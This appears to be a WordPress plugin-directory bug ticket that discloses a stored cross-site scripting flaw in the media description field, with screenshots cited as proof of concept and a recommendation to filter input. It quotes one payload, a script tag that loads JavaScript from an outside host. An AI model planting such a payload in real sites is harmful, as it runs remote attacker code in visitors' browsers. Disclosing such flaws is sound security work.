WordPress.org

Plugin Directory

Opened 5 years ago

#1608 new defect

Stored XSS Flaw in Description Box in the Media tab

Reported by: adityabalapure Owned by:
Priority: high Severity: critical
Plugin: not-listed Keywords: Stored XSS, Media
Cc:

Description

A malicious user who may escalate privileges to gain admin rights if access controls are not practiced properly may use Stored XSS to inject MEDIA DESCRIPTION FIELD with malicious javascripts.

Script Used - <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Attached are the screenshots for Proof of Concept

media-1.png- Describes the screenshot in which a user account having administrator rights or may have escalated administrator rights may inject malicious javascript

media-2.png- Describes the script being executed for all users if anyone tries to access that particular media/image

Recommendation- The description field should be filtered for all users, even administrators.

Attachments (2)

media-1.png (125.8 KB) - added by adityabalapure 5 years ago.
media-1.png- Describes the screenshot in which a user account having administrator rights or may have escalated administrator rights may inject malicious javascript
media-2.png (430.0 KB) - added by adityabalapure 5 years ago.
media-2.png- Describes the script being executed for all users if anyone tries to access that particular media/image

Download all attachments as: .zip

Change History (2)

@adityabalapure5 years ago

media-1.png- Describes the screenshot in which a user account having administrator rights or may have escalated administrator rights may inject malicious javascript

@adityabalapure5 years ago

media-2.png- Describes the script being executed for all users if anyone tries to access that particular media/image

Note: See TracTickets for help on using tickets.